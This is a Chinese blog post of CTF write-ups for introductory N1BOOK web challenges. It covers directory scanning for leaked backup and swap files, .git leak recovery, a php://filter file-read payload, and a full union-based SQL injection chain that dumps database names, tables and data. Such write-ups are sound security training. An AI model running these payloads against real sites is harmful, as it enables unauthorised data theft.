【N1BOOK】[第一章 web入门] wp

【N1BOOK】[第一章 web入门]常见的搜集 wp打开页面就是这样的我们用扫一下目录得到这三个返回正常robots.txt index.php~ .index.php.swp扫目录工具dirsearch/御剑,这里我用的是dirsearch。我们一个个访问一下,他说flag在/flag1_is_her3_fun.txt,那我们就访问一下得到第一半flag,继续访问 index.php~得到第2半flag,继续访问 .index.php.swp,打开文件发现第3半flag..
摘要由CSDN通过智能技术生成


【N1BOOK】[第一章 web入门]常见的搜集 wp

打开页面就是这样的
在这里插入图片描述
我们用扫一下目录得到这三个返回正常robots.txt index.php~ .index.php.swp
扫目录工具dirsearch/御剑,这里我用的是dirsearch。
我们一个个访问一下,
在这里插入图片描述
他说flag在/flag1_is_her3_fun.txt,那我们就访问一下
在这里插入图片描述
得到第一半flag,继续访问 index.php~
在这里插入图片描述
得到第2半flag,继续访问 .index.php.swp,打开文件
在这里插入图片描述
发现第3半flag,综上就是完整的flag~

【N1BOOK】[第一章 web入门]粗心的小李 wp

考点: git泄露
工具:GitHack
下载地址: https://github.com/WangYihang/GitHacker.git

打开页面是这样的
在这里插入图片描述
使用GitHack,python GitHack.py http://648cad17-6be7-4e3b-a1e8-22f3106df202.node3.buuoj.cn/.git,得到一个index.html
在这里插入图片描述

打开

![在这里插入图片描述](https://img-blog.csdnimg.cn/20201126104419751.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RZSl82Mjg=,size_16,color_FFFFFF,t_70#pic_ce

【N1BOOK】[第一章 web入门]afr_1 wp)

根据题目我们知道考察的是** php://协议**
php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。
下面我们构造url,下面是通用格式

http://127.0.0.1/cmd.php?file=php://filter/convert.base64-encode/resource=cmd

那么下面我们这道题的url就是,访问看看

http://ebe70569-0124-4999-bcec-f429d08a0485.node3.buuoj.cn/?p=php://filter/convert.base64-encode/resource=flag

在这里插入图片描述
得到一串base64码,去解开它

在这里插入图片描述
得到flag~
我记得19年的极客大挑战有道题用到了相同的知识点,详细参考 [极客大挑战 2019]Secret File wp~~

【N1BOOK】[第一章 web入门]SQL注入-1 wp

打开页面是这样的,通过url发现请求方式为get

在这里插入图片描述

先注入一个‘发现报错

在这里插入图片描述

确定有sql注入,继续查字段,注入1' order by 1--+返回正常,到1' order by 4--+的时候返回错误,说明字段数为3

在这里插入图片描述

继续查注入点,注入语句-1' union select 1,2,3--+

在这里插入图片描述

发现注入点,继续查库名,注入-1%27%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%23

在这里插入图片描述

得到库名,继续查表名,注入-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables where table_schema='note'%23

在这里插入图片描述

得到表名,继续查字段,注入-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns where table_name='fl4g'%23

在这里插入图片描述

得到字段名,继续爆数据,注入-1%27%20union%20select%201,2,group_concat(concat_ws(0x23,fllllag)) from note.fl4g%23

在这里插入图片描述

爆出数据,得到flag~

就是简单的Union注入,比较常规,不难,按部就班就好。

【N1BOOK】[第一章 web入门]afr_2 wp

先来说说知识点吧
原理Nginx错误

  • 2
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值